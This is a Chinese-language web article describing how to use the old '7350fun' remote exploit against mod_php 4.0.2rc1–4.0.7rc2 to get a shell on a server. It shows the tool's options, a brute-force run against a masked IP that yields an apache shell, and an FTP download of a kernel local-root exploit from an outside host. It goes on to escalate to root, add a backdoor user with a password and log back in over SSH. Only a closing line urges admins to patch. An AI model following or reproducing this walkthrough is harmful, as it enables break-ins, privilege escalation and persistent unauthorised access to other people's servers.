当前位置:首页 > 软件开发 > net
firefox

通过PHP v4.0.2rc1-v4.0.7RC2 exploit program 拿到root

从一台被黑的服务器上找到了如下工具fun
此工具专门用来扫描php
v4.0.2rc1-v4.0.7rc2的exploit程序。找到后通过溢出远程得到一个shell,得到root权限就更简单了。用法如下:
[root@linux_server tmp]# ./fun
7350fun - x86/linux mod_php
v4.0.2rc1-v4.0.7rc2 remote exploit
by lorian.
usage: ./fun [options]
options:
-c check exploitability only, do not exploit
-n no check
mode
-s start bruteforce start (top)
-t target choose target
(1) php
v4.0.2rc1-v4.0.5
(2) php v4.0.6-v4.0.7rc2
经过测试,可以获得一个apache权限的远程shell。
然后通过内核溢出程序可以得到本地root了。经过测试redhat 7.2 服务器得到root权限。
方法如下:
[bob@bob linux_server]$ ./fun -c 202.x.x.x /login.php (验证服务器的php版本)
7350fun -
x86/linux mod_php v4.0.2rc1-v4.0.7rc2 remote exploit
by lorian.
+ checking for vulnerable php version...
+ passed: server says php/4.0.6
(4.0.6,属于可以攻击范围 )
[bob@bob linux_server]$ ./fun -t 2 202.x.x.x
/login.php
7350fun - x86/linux mod_php v4.0.2rc1-v4.0.7rc2 remote
exploit
by lorian.
+ checking for vulnerable php version...
+ passed: server says
php/4.0.6
+ exploiting the bug now...
[+++-------] trying: bffffecc (开始不断的发送溢出代码到remote
server)
[++++++++
[++++++++++
[+++++++---] trying:
bffffe80
[+++++++++
[++++++++++] trying: bffffde8
[+---------] trying:
bffffde4
[++
[+++++++---] trying: bffffc70
[++++++++
[++++++----] trying: bffff9d4
[+++++++
[++++++++
[+++++-----]
trying: bffff9a0
[++++++
[+++++++
[++++++++++] trying:
bffff688
[++++++++++] trying: bffff5dc
+ done ... (一个半小时后,系统告诉我成功了) :p
+ you should be connected to a dup-shell now
+ if not simply try
again
command>
linux manson 2.4.7-10smp #1 smp thu sep 6 17:09:31 edt
2001 i686 unknown
uid=48(apache) gid=48(apache) groups=48(apache)
(我已经远程登录进来了)

ls (敲个ls
,下面就是系统的目录)
bin
boot
dev
etc
home
initrd
lib
lost+found
misc
mnt
opt
proc
root
sbin
tmp
usr
var
cd
/tmp
ftp 219.x.x.x (去拿内核溢出代码 for
2.4.7-10)
bob
password:buyllshit
name (219.x.x.x:apache): not logged
in. (丫的密码敲错了)
login failed.
by
ftp
219.x.x.x
bob
password:bullshit (这回正确了)
cd backdoot
name
(219.x.x.x:apache): /backdoot: no such file or directory. (目录敲错了)
cd
backdoor
get xp (拿到内核本地溢出程序了)
by
chmod +x xp (放在tmp目录下面,给xp程序加可执行权限)
./xp
[+] attached to
17306
[+] signal caught
[+] shellcode placed at 0x4001189d
[+] now wait
for suid shell... (溢出成功)
useradd bob
/bin/sh: useradd: command not found (应该是我的path没有
/usr/sbin,那我直接去找好了)
locate
useradd
/etc/default/useradd
/usr/sbin/useradd
/usr/share/man/man8/useradd.8.gz
cd
/usr/sbin
./useradd bob (加好了bob)
passwd bob
new password:
bullshit
bad password: it is based on a dictionary word
retype new
password: bullshit
changing password for user bob
passwd: all
authentication tokens updated successfully (密码更改成功)
exit
exit
接下来的动作就不需要我重复了,自己用secure
crt软件ssh
登陆你刚才设定好的用户名跟密码。然后还是执行那个xp程序,你就是root了。
此程序比较老了,我也是最近研究一台被入侵的服务器才发现此工具的。
而且我从http://packetstormsecurity.org
也找到了此程序。
目前国内不少服务器还使用着如上有问题的php版本,所以需要抓紧更新了

 ↓相关文章:
© 2006-2008 All Rights Reserved